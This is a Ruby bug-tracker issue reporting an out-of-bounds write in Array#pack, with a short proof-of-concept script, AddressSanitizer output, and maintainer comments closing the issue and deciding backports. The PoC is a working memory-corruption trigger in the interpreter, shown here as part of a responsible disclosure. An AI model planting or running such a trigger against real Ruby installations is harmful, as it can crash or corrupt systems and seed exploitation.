Actions
Bug #22337
closedOOB write in array.pack()
Bug #22337:
OOB write in array.pack()
Description
Hi, I found a case that causes an oob write in array.pack()
PoC:
buf = "Z" * 4096
$buf = buf
evil = Object.new
def evil.to_int
$buf.replace("q")
123456789
end
[evil].pack("r", buffer: buf)
asan output (truncated):
==ERROR: AddressSanitizer: use-after-poison ... WRITE of size 1
#0 bary_pack bignum.c:911
#1 rb_integer_pack bignum.c:3673
#2 pack_pack pack.c:800 <- write at RSTRING_PTR(res)+stale_start
#3 vm_opt_newarray_pack_buffer vm_insnhelper.c:6632
Address ... is a wild pointer inside of access range of size 0x1.
Updated by peterzhu2118 (Peter Zhu) 2 days ago
- Status changed from Open to Closed
- Backport changed from 3.3: UNKNOWN, 3.4: UNKNOWN, 4.0: UNKNOWN to 3.3: WONTFIX, 3.4: REQUIRED, 4.0: REQUIRED
Thank you for the bug report, I believe this has already been fixed in this PR. I have marked this for backport.
Updated by nagachika (Tomoyuki Chikanaga) about 16 hours ago
- Backport changed from 3.3: WONTFIX, 3.4: REQUIRED, 4.0: REQUIRED to 3.3: WONTFIX, 3.4: DONTNEED, 4.0: DONTNEED
The 'r/R' specifiers are added in 4.1. I suppose we don't have to backport this.
Actions